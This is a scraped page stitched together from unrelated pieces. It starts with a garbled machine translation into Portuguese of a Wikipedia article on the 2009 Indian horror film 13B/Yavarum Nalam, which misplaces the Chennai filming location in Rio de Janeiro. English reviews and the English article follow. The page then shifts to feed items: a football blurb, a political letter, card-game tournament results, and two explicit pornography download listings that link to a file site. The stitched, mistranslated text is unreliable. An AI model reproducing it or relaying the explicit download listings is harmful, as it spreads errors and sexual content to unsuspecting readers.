[Editar] Desenvolvimento O diretor do filme, Vikram Kumar, ganhou o Prêmio Nacional de seu curta-metragem "Silent Scream". Aqui ele se juntou com Sreeram cineasta PC, editor SREEKAR Prasad, designer de som AS Lakshminarayanan e diretor de arte Sameer Chanda, que também acontecerá a ser vencedores do Prêmio Nacional de Cinema. O título era Hindi trabalhando Channel. [3] [Editar] Fundição Esha Deol e Kareena Kapoor foram inicialmente considerado para o papel principal, que acabou indo para Neetu Chandra. Chumbo atriz Neetu Chandra fez sua estréia com Tamil Yaavarum Nalam. Ela estrelou em filmes de sucesso como o Hindi Oye Lucky! Oye Lucky! e sinal de trânsito. Levar Madhavan ator e diretor de fotografia PC Sreeram já havia trabalhado juntos no Alaipayuthey filme de sucesso. O veterano ator Hindi Dhritiman Chaterjee fez sua estréia Tamil cinema em Yaavarum Nalam, mas Tamil não era uma língua nova para ele, como ele é um morador de Chennai. Ele desempenhou o mesmo papel na versão Hindi do filme. O veterano ator Marathi Sachin Khedekar, que fez sua estréia no cinema com Tamil Yaavarum Nalam, tomou um grande esforço em aprender suas linhas. Um CD de voz foi enviada para ele com suas linhas ler para que ele pudesse se familiarizar com o diálogo Tamil. Ele interpreta o mesmo personagem na versão Hindi também. [Editar] As filmagens A maior parte do filme se passa dentro de um apartamento. Um piso de tiro temporária foi criada a partir do zero em Egmore, Rio de Janeiro, dentro do qual um conjunto de apartamentos elaborado foi erguido. [Editar] Recepção [Editar] Box Office O filme acabou por ser um sucesso de bilheteria Tamil, arrecadando 16 crore. [4] [5] [6] [7] A versão Hindi foi um sucesso de compensação 8,1 crore. [8] [Editar] Trilha Sonora A música do filme foi composta por Shankar-Ehsaan-Loy enquanto a letra em hindi e tamil foram escritos por Neelesh Mishra e Thamarai respectivamente. 13B/Yaavarum Nalam Álbum da trilha sonora por Shankar Ehsaan Loy Lançado 06 de fevereiro de 2009 Gravado 2008 Gênero trilha sonora de longas-metragens 39:33 de comprimento Hindi Tâmil AVM rótulo Produtor Shankar Ehsaan Loy Shankar Ehsaan Loy cronologia Konchem Ishtam Konchem Kashtam (2009) 13B/Yaavarum Nalam (2009) Shortkut (2009) [Editar] Hindi Título No. Artist comprimento (s) 1. "Sab Khairiyat Hai" Shankar Mahadevan 01:46 2. "Se Bade Shehar Mein" Karthik 04:30 3. "Oh Mama Sexy" Anushka Manchanda, Baba Sehgal, Loy Mendonsa 04:06 4. "13 B - Tema" 4:57 5. "Aasma Odhkar" K.S. Chitra, Shankar Mahadevan 04:25 6. "Sab Khairiyat Hai (Remix)" Shankar Mahadevan 04:04 7. "Aasma Odhkar (Remix)" K.S. Chitra. Shankar Mahadevan 8. "Oh Mama Sexy (Remix)" Anushka Manchanda, Baba Sehgal, Loy Mendonsa 04:37 9. "Se Bade Shehar Mein (Remix)" Karthik 05:08 [Editar] Tamil Título No. Artist comprimento (s) 1. "Yavarum Nalam" Shankar Mahadevan 01:46 2. "Chinnakkuyil Koovam" Karthik 04:30 3. "Oh Mama Sexy" Anushka Manchanda, Jassie presente 04:06 4. "Yavarum Nalam - Tema" 4:57 5. "Kaatrilae Vaasame" K.S. Chitra, Shankar Mahadevan 04:25 6. "Yaavarum Nalam (Remix)" Shankar Mahadevan 04:04 7. "Kaatrilae Vaasame (Remix)" K.S. Chitra. Shankar Mahadevan 8. "Oh Sexy Mama (Remix)" Anushka Manchanda, Jassie presente 04:37 9. "Chinnakkuyil Koovam (Remix)" Karthik 05:08 [Editar] Referências ^ A b "Top 10 filmes de 2009". Hindustan Times. 2009/12/24. Retirado 2012/03/16. ^ 13 rendeu 8,3 crore ^ Chennai365.com: "Yavarum filme Nalam Galeria de Fotos" ^ Tamil Top Ten Cinema - Yavarum Nalam ^ "Headlines notícias de entretenimento em Tamil | Notícias de Entretenimento - Yahoo! Dinamalar Tamil News". In.tamil.yahoo.com. 2011/04/20. Retirado 2012/03/16. ^ Yavarum Nalam recolhe 16 crore nas bilheterias ^ "Yaavarum Nalam - Behindwoods.com - Tamil dez melhores filmes - Guru En Aalu Mariyadhai Sarvvam Rajadhi Raja Ayan". Behindwoods.com. Retirado 2012/03/16. ^ [All India 2009 Box http://www.boxofficeindia.com/showProd.php?itemCat=290&catName=MjAwOQ India Office] [Editar] Ligações externas
13 Movie Trailer 13 Movie Review em BIGisBIG.com, BIG Blog Oficial Pictures. BehindWoods.com: "Maddy combinação Vikram para ser um passeio de emoção", por Behindwoods News Bureau, 18 Dezembro 2007 Film Review: 13B J-horror-styled supernatural thriller from India doesn't have the gore or intensity of the real thing, and for many in the mainstream, that's a relief. Low-budget-looking but effective, with a great central gimmick. March 6, 2009 For movie details, please click here. Taking a cue from its Asian neighbors, the Indian supernatural thriller 13B blends the domestic-terror dread of Japanese horror and its Korean and Thai brethren— all down the alphabet from J-horror to K-horror to T-horror—with beige/brown, washed-out, 1970s-style cinematography. The result is an unsettling hybrid, in the best sense: Plagued as it is by a low-budget look and a bevy of suspense tropes, this Hindi-language feature debut by writer-director Vikram K. Kumar (whose 10-minute "Silent Scream" won, of all things, his country's National Film Award for Best Educational/Motivational/Instructional Film in 1999) supplies ghostly chills effectively and through a marvelously original conceit. Civil engineer Mannu Manohar (the well-regarded actor and activist Madhavan Ranganathan) has just moved with his extended family into a deee-luxe apartment in the sky-ai-ai. He and his brother Manoj, a fellow professional, may have overextended themselves, but their duplex apartment 13B is a modernistic oasis for them and their mother (Poonam Dhillon); their collegiate sister Divya; Mannu's wife Priya (Neetu Chandra); and Manoj's wife and two young kids. The elevator doesn't seem to work when Mannu wants to take it, but hey, it's a new building and some bugs need to be worked out. So do a lot of other things, as it happens. Photos taken on Mannu's mobile phone come out twisted and grotesque when shot in the apartment, and nowhere else. The blind old neighbor's great big protective dog whimpers like a scared puppy at the threshold of the apartment. And the sisters-in-law and Mom start watching a soap opera, "Sab Khairiyat" ("All is Well") that airs at 13:00 hours on channel 13—in apartment 13B only, as Mannu discovers to his growing horror. That only intensifies when the family and events onscreen mirror his own almost exactly, with a barely fictionalized veneer. When the soap opera begins depicting terrible tragedies that start coming true, Mannu becomes emboldened enough to tell his old friend, police sub-inspector Shiva (Murli Sharma), and to visit Mom's doctor, Balram Shinde (Sachin Khedekar), whose in extremis work has led him to believe in the paranormal.
Mannu's increasingly obsessive quest for the root of what's occurring leads him and Shiva to unearth—literally, as it happens—details of a horrific mass murder of a family at this same building site in 1977. The TV set is their medium, and the program is their message—sort of. Why the powers-that-be do what they do makes no sense whatsoever in retrospect, but Kumar's brisk and knowing way with this type of story makes all that slip by as you watch a decent, ordinary man suspensefully fall deeper and deeper into hell through no fault of his own. Two unexceptional ballads by the star songwriting team of Shankar-Ehsaan-Loy play over family montages, but there's a kick-ass song over the end credits—the completely incongruous "Oh Sexy Mama," in which Madhavan, Chandra and many bump-and-grind beauties in PVC short-shorts gyrate to a dance number that would have done Robert Palmer proud. Very unusually, perhaps unprecedentedly since the days of early talkies, the movie was shot in two versions simultaneously, with mostly the same cast, in two languages, with the Tamil Yavarum Nalam and the Hindi 13B being released the same day. (Kumar has previously worked in the Tamil and Telugu languages.) While Tamil movies are often remade in Hindi, this maximizing of sets and actors doesn't seem to happen much, if at all. Unusual in a bad sense are the poor subtitle graphics, Luiza Goianapolis Director: Vikram K. Kumar Banner: Big Pictures Music Director: Shankar Mahadevan, Ehsaan Noorani, Loy Mendonsa Lyricist: Neelesh Misra Star Cast: R. Madhavan, Neetu Chandra, Sachin Khedekar, Murli Sharma, Poonam Dhillon, Murli Sharma, Deepak Dobriyal, Dhritiman Chatterjee Release Date: 6th March 2009
If you are looking for a thriller, which will keep you on the edge of your seat all the time, then 13B might just be the movie for you. Based on an innovative plot, which (thankfully!) does not involve the use of disgusting-looking ghost faces, psycho babas or excessive camera movements, 13B impresses you on a number of points. One of the first things that strike you is that the setting of the whole story is quite relatable and brings out horror in the normal course of events only. There is no visiting a 'purani' (old) haveli or going somewhere alone, in the dead of the night, for the scary events to take place. Vikram K. Kumar takes all the credit for keeping you hooked on, with his direction as well as his screenplay and dialogues. Another aspect, on which 13B scores pretty well, is that the explanation behind the occurrence of strange, you can also say supernatural, events is quite convincing. Even the background score adds to the horror. There are certain flaws in the movie, such as its long duration (which could have been edited a bit more) and the dream song between Madhavan and Neetu (totally unnecessary). However, none of them are bad enough to adversely affect the movie to a great extent. Talking about performances, Madhavan is the first name that comes to mind. His expressions beautifully convey the confusion, dread and panic his character is going through. As for Neetu Chandra, she is seen in a 'less-makeup' avatar and gives good support to Madhavan. Murli Sharma is another character that manages to impress us, especially with his perfect comic timing. Poonam Dhillon, seen in movies after a long time, hasn't lost her touch. Even Sachin Khedekar and Deepak Dobriyal were good in their respective roles. You will surely not regret spending money and watching 13B in a multiplex! 13B Pre-release Review After 'Raaz - The Mystery Continues', get set to witness another movie based on the horror genre - '13B'. Directed by National Award winning director - Vikram K. Kumar, the movie has R. Madhavan and Neetu Chandra in the lead roles, supported by Sachin Khedekar, Murli Sharma, Poonam Dhillon, Murli Sharma, Deepak Dobriyal and Dhritiman Chatterjee. It has the famous trio of Shankar-Ehsaan-Loy providing music, to the lyrics of Neelesh Misra. The film will be released on 6th March 2009, under the banner ' Big Pictures'. A supernatural thriller, '13B' has been set amidst an urban backdrop and revolves around the life of Manohar (R. Madhavan), his wife Priya (Neetu Chandra) and their family members. Manohar is a hard working Civil Engineer, who is 31 years of age and happily married. A typical urban Indian male, his main concerns in life include providing his family with all the amenities reckoned necessary for leading a comfortable lifestyle. He is rational in his thoughts and practical in his approach, with an analytical bent mind and clear thinking. Manohar's wife Priya represents a typical modern day homemaker, who is extremely supportive of her husband. Like most of the housewives in the present times, she is also in love with the daily soaps coming on TV. She is a devoted daughter-in-law, a loving sister-in-law and a playful, considerate aunt. The life of Manohar and Priya is moving smoothly and now, they are looking forward to having a family of their own, trying to have a child. Manohar changes his house and moves into a new apartment, with his family.
Numbered 13B, Manohar's apartment is on the 13th floor of a building. Soon, they settle into the house, where the women find a new love - watching the latest TV show ''Sab Khairiyat'' (All is Well). Oddly enough, the family in the show is quite similar to Manohar's. Initially, a number of good things take place in the show and similar events take place in Manohar's family as well. However, soon, things take a turn for the worse. Will the shocking incidents seen in the show affect Manohar and his family also? Why is this happening? Will Manohar be able to solve the mystery before it's too late? The answers are not too far away! Manohar, an upwardly mobile middle class Indian moves into a new apartment - 13B on the 13th floor with his family. From the first day in their new home, the women are hooked on to a new TV show 'Sab Khairiyat' (All's Well). The show is about a family eerily similar to theirs who have also just moved into a new house. As the TV show unfolds, all the incidents that happen in the show start happening to Manohar and his family. Initially, a number of happy events take place and a lot of good things happen, both in the show and with Manohar's family. Then things take a turn for the worse and shocking incidents start happening in the TV show... Will the same happen to Manohar and his family? Will Manohar be able to solve the mystery in time before it consumes him and his entire family?
Film: 13B (Horror) Cast: R. Madhavan, Neetu Chandra, Sachin Khedekar Direction: Vikram K Kumar Duration: 2 hours 25 minutes Critic's Rating: Now this one's a neat little goosebump that keeps the chill factor on simmer, both in terms of content and charisma (read style). Generally, desi horror flicks end up low on story and crumble in the climax, relegating the suspense and gore to some mumbo-jumbo about witchcraft and voodoo. Rarely do they come up with some satisfactory explanation for all the paranormal bhoot lore on screen, before the closing reels. But that's not the case with 13B. On the one hand, it keeps the scare element brewing through most of the film, with danger and death lurking at every twisted turn. On the other, it blends the supra-normal with the normal, to give you a plausible reason for all the strange occurrences on screen. More importantly, it makes a topical dig on the 21st century global obsession: the all-pervasive -- and prying -- influence of television which seems to have completely taken over our lives. And if that's not a strong-enough statutory warning, the innocuous idiot box may soon be replaced by the inimical mobile as a sanity-threatening device, it concludes. Experts are already stating that 53 per cent of mobile phone users are suffering from nomophobia, (no mobile phobia) a fear of being without their mobile. So there! 13B begins on a cheery note. A happy family, that happens to be a microcosm of the Great Indian Parivar, moves into a new flat that has been bought by the two brothers (Madhavan and co.) after incurring a hefty loan. The upwardly mobile brothers don't mind and begin their day on a joyous note, with the wives (Neetu Chandra and co.) merrily gossiping in the kitchen, the kids boisterously preparing for school and college and the mother (Poonam Dhillon) affably clamouring for a cable connection, since she cannot bear to miss a single episode of her saas-bahu soaps. Picture perfect, did you say? Well, almost. Just that the milk gets curdled every day, the portraits of the gods can't be hung on the impenetrable walls, the lift doesn't work only for Madhavan, his cell phone camera relentlessly distorts his face and the mysterious neighbour's dog simply refuses to enter the flat with his master. Reason enough for rationalist Madhavan to press the panic button? Not until he chances upon a television soap that seems to be playing only in his house and the onscreen drama ends up predicting the events that gradually begin to plague the happy family. Goes without saying, the soap is extremely popular with the women in his house, till the blood begins to flow....And the only way Madhavan can protect his family is by becoming a TV addict himself and learning what's in store. It's an interesting tale, told well, with all the mandatory twists and turns in all the right places. Adding to this, is the complete spontaneity of the ensemble cast, ably led by Madhavan who is extremely endearing as the yuppie, torn between the supernatural and the real. Watch out for some zippy cinematography, a stylised monochrome tint and some snazzy editing. Great timepass. Go for it. Luiza Goianapolis
13B Movie Review Director : Music : Lyrics : Starring : Vikram K.Kumar Shankar-Ehsaan-Loy Neelesh Misra R. Madhavan, Neetu Chandra, Sachin Khadekar, Murli Sharma and Poonam Dhillon. There's a killer in the house in the dead of night. He is banging the television set in the living room and not one of the people sleeping in is disturbed. And this is the 13th floor of a high-rise, not some palatial bungalow. There is no connection with the family living in the said flat with that of the spirits troubling them. There is just one faint thread and even that is not enough to justify the uncanny resemblance to the exact number of the dead to the ones living in the flat. Suddenly, out of nowhere, two songs are forced on screen, with no rhyme nor reason. A huge uncalled for jerk in the screenplay. CHECK OUT: 13B - New frontiers of Cinema making These are just a few flaws of director Vikram Kumar's so-called spook-fest. Yes, the movie drags too, just like a television serial he collaborates on the small screen to justify the happenings on the big. Confusing, right? In short, Madhavan and his brother take a joint loan to move into their new apartment with their mother, sister, wives and his nephews. And strange things start happening only to Madhavan. It's not long before he realizes that the serial his family is hooked onto is actually telling his life in advance. And it appears only on his television set at 13 hours! After investigations, he realizes that there was a bungalow on the same land where their building now stands which was called 13 B, the number of his flat. Apparently, all eight family members were bludgeoned to death and the killer is scot-free. Kumar gives Madhavan the task of getting justice to the victims. For Neetu Chandra, this has been a good film, in the sense it gets her a good show reel. The girl has improved since her days in TRAFFIC SIGNAL. There's also that wonderful actor, Deepak Dobriyal. Give him any role and he just digs himself into the character he is supposed to be. He loses self to become the part he is supposed to be. A super actor. SHAURYA and DELHI 6 are his recent exploits As for the director, he missed the plot completely Yavarum Nalam From Wikipedia, the free encyclopedia Yavarum Nalam The Tamil theatrical release poster as Yavarum Nalam. Directed by Vikram Kumar Produced by Suresh Balaje George Pius Rajesh Sawhney Written by Vikram Kumar Neelu Iyappan Abhinav Singh Kashyap (Hindi Dialogues) Starring R. Madhavan Neetu Chandra Sachin Khedekar Deepak Dobriyal Murli Sharma Dhritiman Chatterjee Sampath Raj Saranya Music by Shankar-Ehsaan-Loy Tubby Parik Cinematography P. C. Sreeram Editing by Sreekar Prasad Distributed by Big Pictures Release date(s) March 6, 2009 Running time 137 minutes Country India Language Tamil Hindi Budget 6 crore[1] Box office 16 crore (Tamil) 8.1 crore (Hindi)[1][2] Yavarum Nalam (English: All is well) is a 2009 Tamil psychological horror film directed by Vikram Kumar, starring R. Madhavan and Neetu Chandra in the lead roles. Produced by Suresh Balaje and George Pius, the film was simultaneously filmed and released in Tamil and also Hindi as 13B with a slightly different cast. The film's soundtrack was composed by Shankar-Ehsaan-Loy and background score by Tubby Parik. The film was released on 6 March 2009 to highly positive reviews from critics in Tamil and mixed reviews in Bollywood. Contents [hide] 1 Cast 2 Plot 3 Production 3.1 Development 3.2 Casting 3.3 Filming 4 Reception 4.1 Box Office 5 Soundtrack 5.1 Hindi 5.2 Tamil 6 References 7 External links [edit]Cast Actor (Tamil version) Actor (Hindi version) Role R. Madhavan Manohar Neetu Chandra Priya Ravi Babu Murali Sharma Siva Sachin Khedekar Dr. Balu / Dr. Shinde Sanjaih Bokaria Manoj Amitha Rajan Deepa Saranya Poonam Dhillon Manohar's mother Dhritiman Chatterjee Mr. Kamdhar Deepak Dobriyal Senthil / Ashok Sampath Raj Ramachandran Kushboo Sundar Roshan Abbas Show host Rachana Maurya an item number [edit]Plot Manohar, an upper-middle class Indian, moves into a new apartment - 13B on the 13th floor - with his family, fulfilling one of his life's biggest dreams. But the family is greeted by a series of small trivial incidents such as milk getting spoiled that could be regarded as inauspicious but are shrugged off by the excited Manohar. The lift in the apartment does not operate for Manohar. The women in the family get hooked on to a new TV show Yavarum Nalam (Everyone Is Well, or Sab Khairiyat in the Hindi version). The show is about a family eerily similar to theirs who have also just moved into a new house just like they have. As the serial unfolds, Manohar notices that the incidents that happen in the serial are a reflection of what has happened to Manohar and his family. The serial mirrors Manohar's family life. For example, his sister graduating first-class, his wife getting pregnant and later suffering a miscarriage. The rest of the family remains oblivious to the similarities and Manohar prefers it that way to avoid panic. He also notices that his camera will take twisted pictures of him while he is in the apartment, but not while he is out of the apartment. As Manohar fights the uneasy feeling in his mind, things start taking a turn for the worse in the serial. He is now terrified that the same might happen to his family as well. Manohar now wants to know who is behind the making of this serial and what their intentions are. As Manohar explores the mysterious happenings, he unravels a deep and unholy secret. The house they live in was the house where a whole family of eight were murdered way back in 1977. It was the family of a TV news reader named Chitra. On the day of Chitra's engagement an ardent fan (Shriram Shinde in the 13B version) of Chitra wanted to stop the engagement and he failed in doing so. Disheartened, he committed suicide. Subsequently, all members of that family were murdered with a hammer in a single day. The blame rested on the crazy brother in the family, as he had been seen with the hammer last. The police officer investigating the case also committed suicide by hanging himself in the same house. Now Manohar and his friend, Shiva (Murli Sharma), who is a policeman, are in the process of unraveling the mystery. Manohar researches the madman Senthil/Ashok, who apparently goes crazy after seeing the TV show in an asylum. Manohar then meets Senthil, who extends a hand for Manohar but drags him inside, but his friend Shiva keeps him from being dragged. They then met Chitra's former fiance Ramchandar, who tries to plead for Senthil's innocence because he got covered in blood while he hugged the bodies, failed in the case. After researching one night, Manohar has a nightmare of the 13B murderer climbing the stairs to kill his family. When Manohar tries to climb the stairs, he always ends up on the 2nd floor and after a few moments he wakes up. He then goes to the hall and witnesses the climax of Yavarum Nalam/Sab Kheriyat when they are showing the murderer's identity; he sees two hammers, one pointed hammer and a blunt sledge-hammer, then showing Manohar's face as the killer. What follows is the climax that ties up all the loose ends. The 13B murderer is Dr Balu/Dr Shinde, who sees the family members' faces as serial family members.It was he who killed them in 1970's on the behalf of his brother and also killed the police officer who caught him red-handed. Manohar kills him. The story ends with Manohar living a normal life with a new dog in the family; the milk is not getting spoiled anymore. They bring Senthil/Ashok home and the lift in the apartment finally works for Manohar. Manohar receives a call from Dr Balu/Dr Shinde while in the lift, who says that while the 13B family haunts the TV, he haunts Manohar's phone. [edit]Production
[edit]Development The director of the film, Vikram Kumar, won a National Award for his short film "Silent Scream". Here he teamed up with cinematographer P. C. Sreeram, editor Sreekar Prasad, sound designer A. S. Lakshminarayanan and art director Sameer Chanda, who also happen to be National Film Award winners. The Hindi working title was Channel.[3] [edit]Casting Esha Deol and Kareena Kapoor were originally considered for the lead role which eventually went to Neetu Chandra. Lead actress Neetu Chandra made her Tamil debut with Yaavarum Nalam. She has starred in successful Hindi films like Oye Lucky! Lucky Oye! and Traffic Signal. Lead actor Madhavan and cinematographer P. C. Sreeram had previously worked together on the hit movie Alaipayuthey. Veteran Hindi actor Dhritiman Chaterjee made his Tamil cinema debut in Yaavarum Nalam, but Tamil was not a new language for him, as he is a resident of Chennai. He played the same role in the Hindi version of the film. Veteran Marathi actor Sachin Khedekar, who made his debut in Tamil cinema with Yaavarum Nalam, took great effort in learning his lines. A voice CD was sent to him with his lines read out so that he would get familiar with the Tamil dialogue. He plays the same character in the Hindi version as well. [edit]Filming The majority of the film takes place inside an apartment. A temporary shooting floor was created from scratch in Egmore, Chennai, inside which an elaborate apartment set was erected. [edit]Reception [edit]Box Office The movie turned out be a Hit at the Tamil box office, grossing 16 crore.[4][5][6][7] The Hindi version was a hit netting 8.1 crore.[8] [edit]Soundtrack The film's music was composed by Shankar-Ehsaan-Loy while the lyrics in Hindi and Tamil were penned by Neelesh Mishra and Thamarai respectively. 13B/Yaavarum Nalam Soundtrack album by Shankar Ehsaan Loy Released 6 February 2009 Recorded 2008 Genre Feature film soundtrack Length 39:33 Language Hindi Tamil Label AVM Producer Shankar Ehsaan Loy Shankar Ehsaan Loy chronology Konchem Ishtam Konchem Kashtam (2009) 13B/Yaavarum Nalam (2009) Shortkut (2009) [edit]Hindi No. Title Artist(s) Length 1. "Sab Khairiyat Hai" Shankar Mahadevan 1:46 2. "Bade Se Shehar Mein" Karthik 4:30 3. "Oh Sexy Mama" Anushka Manchanda, Baba Sehgal, Loy Mendonsa 4:06 4. "13 B - Theme" 4:57 5. "Aasma Odhkar" K.S. Chitra, Shankar Mahadevan 4:25 6. "Sab Khairiyat Hai (Remix)" Shankar Mahadevan 4:04 7. "Aasma Odhkar (Remix)" K.S. Chitra. Shankar Mahadevan 8. "Oh Sexy Mama (Remix)" Anushka Manchanda, Baba Sehgal, Loy Mendonsa 4:37 9. "Bade Se Shehar Mein (Remix)" Karthik 5:08 [edit]Tamil No. Title Artist(s) Length 1. "Yavarum Nalam" Shankar Mahadevan 1:46 2. "Chinnakkuyil Koovam" Karthik 4:30 3. "Oh Sexy Mama" Anushka Manchanda, Jassie Gift 4:06 4. "Yavarum Nalam - Theme" 4:57 5. "Kaatrilae Vaasame" K.S. Chitra, Shankar Mahadevan 4:25 6. "Yaavarum Nalam (Remix)" Shankar Mahadevan 4:04 7. "Kaatrilae Vaasame (Remix)" K.S. Chitra. Shankar Mahadevan 8. "Oh Sexy Mama (Remix)" Anushka Manchanda, Jassie Gift 4:37 9. "Chinnakkuyil Koovam (Remix)" Karthik 5:08 [edit]References ^ a b "Top 10 movies of 2009". Hindustan Times. 2009-12-24. Retrieved 2012-03-16. ^ 13B netted 8.3 crore ^ Chennai365.com: "Yavarum Nalam Movie Photo Gallery" ^ Tamil Cinema Top Ten - Yavarum Nalam ^ "Entertainment News Headlines in Tamil | Entertainment News – Yahoo! Dinamalar Tamil News". In.tamil.yahoo.com. 2011-04-20. Retrieved 2012-03-16. ^ Yavarum Nalam collects 16 crore at the box office ^ "Yaavarum Nalam - Behindwoods.com - Tamil Top Ten Movies - Guru En Aalu Mariyadhai Sarvvam Rajadhi Raja Ayan". Behindwoods.com. Retrieved 2012-03-16. ^ [All India 2009 http://www.boxofficeindia.com/showProd.php?itemCat=290&catName=MjAwOQ Box Office India] [edit]External links 13B Movie Trailer 13B Movie Review on BIGisBIG.com, BIG Pictures Official Blog. BehindWoods.com: "Maddy Vikram combo to be a thrill ride", by Behindwoods News Bureau, 18 December 2007
          Vikings’ Sheldon Richardson talks defense’s 10-sack effort vs. Lions      Cache   Translate Page      
When a defense generates 10 sacks in a game, it's fair to assume that it saw something it could exploit in the opponent's pass protection. But, for the Vikings' defense vs. the Lions, that wasn't completely true.
          Europe Uncut — Bonus Scene — Chad Brock Gangbang      Cache   Translate Page      
Europe Uncut — Bonus Scene — Chad Brock Gangbang
Release Year: 2018
Cast: Chad Brock, Anton Dickson, Paul Mann & Myles Bentley
Genres: Bareback Porn
Video language: English

Chad brock was visiting london and liam set up a group fuck for him. Liam decided to give a second camera to swede anton dickson, so he could film the fucking close-up. He also decided to shoot it with just the onboard light from the point of view camera. Muscle daddies myles bentley and paul mann have chad get their cocks primed to fuck while anton looks on from across the room. Then the fucking begins. Myles and paul take turns exploiting chad’s ass one after the other showing him he is there to take their cum and nothing more. Of course anton eventually gets in on the action, filming his own cock sliding in and out until he adds his own jizz to the frothy mess. This special director’s cut of the scene is presented the way liam intended it to be seen: in split screen so you can watch both what liam is filming and also get that insider view from anton.

Format: mp4
Duration: 24:06
Video: 1920x1080, AVC (H.264), 4890kbps
Audio: 184kbps


Europe Uncut — Bonus Scene — Chad Brock Gangbang
File size: 896.4 MB

Europe Uncut — Bonus Scene — Chad Brock Gangbang

Europe Uncut — Bonus Scene — Chad Brock Gangbang
http://svalka.ws/
          The people in the poorest part of the US have no reason whatsoever to blame Trump for their desperation… yet.      Cache   Translate Page      
Sir, Rana Foroohar writes,“It never ceases to amaze me that a man I consider the most venal and rapacious president in history has managed to sell desperate people in the poorest parts of the US on the idea that he is their saviour”, “America’s vote marks a culture shift” November 5.

Why would that be surprising? The people in the poorest part of the US have no reason whatsoever to blame Trump for their desperation… yet.

Foroohar writes,“Most Americans, liberal and conservative, are united in their definition of what constitutes “just” business behaviour — they believe it is about spreading the wealth, and improving worker pay and treatment.”

Really? Would most Americans, liberal and conservative, not believe that what constitutes “just” business behaviour — is first and foremost to create that economic growth that could generate opportunities for them?

Foroohar concludes, “It would be wise for both politicians and business to focus on those ideas that bring people together, rather than those that drive them apart”. 

What does she mean by “And business”? Except for some truly minuscule exceptions we have not seen any ordinary business dedicating itself to driving people apart. That is normally very bad for business. What we sure have seen is way too many politicians, activists and journalists, being in the business of polarization… many of them even very happy of being able to exploit Trump in order to improve the profitability of their franchise.

What would they all be doing, and writing about, was there no Trump? They better thank their lucky star.

@PerKurowski

          DungeonCorp      Cache   Translate Page      
DungeonCorp
Cast: Mikayla Hendrix, Athena Angel, Lizzy London, Sandy Skarsgard, Riley Richman,
Genres: Bondage
Video language: English

A Deep, Consensual Study, Exploration & Exploitation of Female Submission. These Women
Agree to be Bound and Bent to Our Will, For Our Control & Arousal...

The Most Beautiful Slaves...The Hardest Handlers...World Class BDSM Since 2001...

DungeonCorp DungeonCorp
DungeonCorp DungeonCorp

DungeonCorp
Total size: 2.7 GB in 12 files.

DungeonCorp
http://svalka.ws/
          Tales from the Winter Court      Cache   Translate Page      
Published 6 November 2018 | Legend of the Five Rings LCG

Tales from the Winter Court

Official Results from the 2018 Winter Court World Championships
 

"These words were heavier than even the death of a clan champion—or a brother. This scroll, this particular piece of paper, was likely the most important he would ever write."
   
–D. G. Laderoute, "Tiger Stalks His Prey"

The 2018 Winter Court World Championships for Legend of the Five Rings: The Card Game have come and gone. The champion, Erik Baalhuis of the Crane Clan, has been named Shogun. He has momentarily gained the Emperor's ear, and he has been entrusted with deciding which samurai will tackle one of the Crane's most pressing issues—to travel with Doji Kuzunobu and aid his appeal to the Fox Clan for assistance.

Erik was not, however, the only samurai honored with the opportunity to help guide his clan. The top representatives from all seven of Rokugan's Great Clans were given the chance to make two important decisions that impact their clans' futures—as well as the course of Legend of the Five Rings: The Card Game Organized Play.

  • Each of these samurai advised their champion as to which family would address one of their clan's greatest concerns.
  • Each of these samurai also selected their clan's new elemental role, which goes into effect immediately through the end of August 2019.

What does this mean for the future of your clan? Read on!

Crab

The Wall must not be breached, so after the watchtower at Ishigaki Province fell silent, Crab Clan Champion Hida Kisada recognized that he would need to send samurai to investigate. But each different samurai would take a different approach. Who, then, should he send?

That choice fell to Pablo Pintor Espinosa, who battled all the way to the Top 8 at the Winter Court World Championships. He advised Hida Kisada to send a samurai of the Yasuki family, in order to recruit their neighboring allies to reinforce and defend the watchtower.

Additionally, Pablo selected Keeper of Water as the Crab's new elemental role.

Clan Effective Through April 2019 Effective Through August 2019


Crab


Seeker of Earth


Keeper of Water

 

Crane

Over the past months, the Crane Clan have been taxed by skirmishes with the Lion, raids by the Mantis, and an elemental imbalance off the coast that threatens their lands. They need assistance, and Doji Kuzunobu has been sent to recruit the Fox Clan’s aid. But which samurai should Doji Hotaru send to accompany her husband?

For guidance, the Crane Clan Champion turned to her new Shogun, whose performance at the Winter Court honored the whole clan. He advised Doji Hotaru to send a samurai from the Kakita family in order to protect Doji Kuzunobu from threats that lurk in the perilous Kitsune forest. Because Erik had just won the title of Shogun, Doji Hotaru pressed him even further, asking him which of the Kakita family he might send. Erik recommended Kakita Kaezin, and that is who will now represent the Crane in this matter!

Additionally, with his World Championship, Erik won the Crane Clan's right to make the first selection of a new elemental role, and he chose Seeker of Fire.

Clan Effective Through April 2019 Effective Through August 2019


Crane


Keeper of Air


Seeker of Fire

Dragon

Dragon Clan Champion Togashi Yokuni has foreseen something momentous coming from the sea of turmoil lapping at the walls of Otosan Uchi. To ensure the Dragon are prepared to meet this threat and opportunity and moment of change, he has sent Mirumoto Hitomi and Togashi Mitsu. He also intends to send them with an escort of samurai, but of which family? The answer to this question is an answer, as well, as to how the Dragon will respond to the questions they’ll face at Otosan Uchi.

With his Top 4 finish at the Winter Court World Championships, Davis Kingsley won the Clan Champion's respect and was asked for his advice. Davis advised Togashi Yokuni to send samurai from the Kitsuki family to Otosan Uchi who would investigate the intrigues of the Forbidden City.

Davis also won the right to select the Dragon Clan's next elemental role and chose Seeker of Void.

Clan Effective Through April 2019 Effective Through August 2019


Dragon


Keeper of Void


Seeker of Void

Lion

Because Lion Clan Champion Akodo Toturi also serves the Empire as Emerald Champion, he finds himself in a position to elevate the clan's status by appointing one of its greatest samurai to serve as Commander of the Emerald Legions. That samurai's actions will, in turn, reflect upon the Lion Clan, so Akodo Toturi must give careful consideration to his appointment.

For advice, he turned to Philippe-André Pelletier, who distinguished himself and won honor for the Lion Clan at the Winter Court World Championships with his play in the Day 2 elimination rounds. Philippe-André recommended that Akodo Toturi appoint a samurai of the Kitsu family in order to command with guidance from the recently departed.

Philippe-André also earned the right to select the Lion Clan's next elemental role, and he selected Keeper of Earth.

Clan Effective Through April 2019 Effective Through August 2019


Lion


Seeker of Void


Keeper of Earth

Phoenix

The recent imbalance in the elements and mounting tensions between clans have weighed heavy upon the Phoenix, who need the guidance of the Elemental Masters. Accordingly, Phoenix Clan Champion Shiba Tsukune has decided to send samurai south to Kuni lands in order to find Isawa Tadaka, the Elemental Master of Earth. But whom should she send?

